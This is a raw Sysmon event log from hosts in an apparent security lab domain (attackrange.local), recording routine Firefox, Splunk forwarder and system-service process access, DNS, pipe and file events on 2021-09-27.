09:16:54.592{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051317Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.577{5EBD8912-8C06-6151-5A7A-00000000FC01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000001051316Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.158{5EBD8912-7B3A-6151-3A78-00000000FC01}7120assets.readthedocs.org02606:4700:3035::6815:16e9;2606:4700:3033::ac43:cf94;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051315Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.152{5EBD8912-7B3A-6151-3A78-00000000FC01}7120assets.readthedocs.org0104.21.22.233;172.67.207.148;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051314Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.151{5EBD8912-7B3A-6151-3A78-00000000FC01}7120assets.readthedocs.org0::ffff:172.67.207.148;::ffff:104.21.22.233;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051313Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.548{5EBD8912-7B3A-6151-3A78-00000000FC01}7120eqllib.readthedocs.io02606:4700::6811:2152;2606:4700::6811:2052;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051312Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.542{5EBD8912-7B3A-6151-3A78-00000000FC01}7120eqllib.readthedocs.io0104.17.32.82;104.17.33.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051311Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.540{5EBD8912-7B3A-6151-3A78-00000000FC01}7120eqllib.readthedocs.io0::ffff:104.17.33.82;::ffff:104.17.32.82;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000001051310Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.372{5EBD8912-7F30-614D-1400-00000000FC01}11045084C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051309Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.271{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051308Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.270{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051307Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.270{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051306Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.239{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-8C06-6151-597A-00000000FC01}6528C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x80000000000000001051305Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:16:54.238{5EBD8912-7B3A-6151-3A78-00000000FC01}7120\chrome.7120.18.171551491C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000001051304Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.237{5EBD8912-7B3A-6151-3A78-00000000FC01}71206788C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-8C06-6151-597A-00000000FC01}6528C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+1b5a9c|C:\Program Files\Mozilla Firefox\xul.dll+a0c416|C:\Program Files\Mozilla Firefox\xul.dll+a06fcf|C:\Program Files\Mozilla Firefox\xul.dll+19c3d4d|C:\Program Files\Mozilla Firefox\xul.dll+19c2501|C:\Program Files\Mozilla Firefox\xul.dll+13ca5|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+13388|C:\Program Files\Mozilla Firefox\xul.dll+9e92c1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001051303Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:16:54.237{5EBD8912-7B3A-6151-3A78-00000000FC01}7120\chrome.7120.18.171551491C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000001051302Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:16:54.236{5EBD8912-7B3A-6151-3A78-00000000FC01}7120\chrome.7120.17.127384188C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000001051301Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.234{5EBD8912-7B3A-6151-3A78-00000000FC01}71203088C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-8C06-6151-597A-00000000FC01}6528C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+133dab|C:\Program Files\Mozilla Firefox\xul.dll+121475d|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x80000000000000001051300Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:16:54.234{5EBD8912-7B3A-6151-3A78-00000000FC01}7120\gecko-crash-server-pipe.7120C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000001051299Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.193{5EBD8912-7B3A-6151-3A78-00000000FC01}71206788C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-8C06-6151-597A-00000000FC01}6528C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+a0040f|C:\Program Files\Mozilla Firefox\xul.dll+872464|C:\Program Files\Mozilla Firefox\xul.dll+16620b4|C:\Program Files\Mozilla Firefox\xul.dll+19c2585|C:\Program Files\Mozilla Firefox\xul.dll+13ca5|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+13388|C:\Program Files\Mozilla Firefox\xul.dll+9e92c1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051298Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.186{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051297Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.186{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051296Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.185{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051295Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.185{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051294Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.185{5EBD8912-79BB-6151-D077-00000000FC01}46125756C:\Windows\system32\csrss.exe{5EBD8912-8C06-6151-597A-00000000FC01}6528C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051293Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.185{5EBD8912-7B3A-6151-3A78-00000000FC01}71201744C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-8C06-6151-597A-00000000FC01}6528C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+2f04d|C:\Program Files\Mozilla Firefox\firefox.exe+2e255|C:\Program Files\Mozilla Firefox\xul.dll+1fc619a|C:\Program Files\Mozilla Firefox\xul.dll+9fbdfa|C:\Program Files\Mozilla Firefox\xul.dll+9f9fc5|C:\Program Files\Mozilla Firefox\xul.dll+a0123e|C:\Program Files\Mozilla Firefox\xul.dll+8ab830|C:\Program Files\Mozilla Firefox\xul.dll+166f6b9|C:\Program Files\Mozilla Firefox\xul.dll+26d8a|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+8ae017|C:\Program Files\Mozilla Firefox\nss3.dll+77cbd|C:\Program Files\Mozilla Firefox\nss3.dll+8ec81|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051292Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.185{5EBD8912-8C06-6151-597A-00000000FC01}6528C:\Program Files\Mozilla Firefox\firefox.exe92.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7120.17.1273841880\1748930388" -parentBuildID 20210903235534 -prefsHandle 8076 -prefMapHandle 8096 -prefsLen 16007 -prefMapSize 235573 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7120 "\\.\pipe\gecko-crash-server-pipe.7120" 7588 16e72a6e138 rddC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{5EBD8912-79BE-6151-7ED6-4A0400000000}0x44ad67e2LowMD5=1FD44F5F8D3DBF02BF76AAAE6AB44D8A,SHA256=A20DDE702CCC7B83A9D8017BBF45738E22EF45E2F2511570E2415BE85F01A4C5,IMPHASH=AECE7B7E776840D7A7255A31B309B7E4{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x80000000000000001051291Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.183{5EBD8912-8C05-6151-587A-00000000FC01}38684872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001051290Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:16:54.181{5EBD8912-7B3A-6151-3A78-00000000FC01}7120\chrome.7120.17.127384188C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001051289Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.092{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45B9AAC575E2D8FC103FAD4616B0BDC7,SHA256=ACBDB04335BD358C49714F8F717453921EAC3B19F363A62B0407B77B00F3E7BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979866Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:50.739{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59444-false10.0.1.12-8000- 23542300x80000000000000001051288Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.011{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\cache2\doomed\19755MD5=43C47210A960C2CA25E0A16997A90193,SHA256=5F267A2785E9A020F6FF2C3D79F8CE457E200EC049D5556FF1587FF928236634,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051287Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.011{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\cache2\doomed\9239MD5=83671B65957067281D0C34156E56D7AD,SHA256=4B62EC110B0FAA88A8ADDE14A77E6CDE0FB91A20131E3941B4D1A63F6CC5721B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051286Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.000{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C05-6151-587A-00000000FC01}3868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051285Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.998{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051284Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.998{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051283Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.998{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051282Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 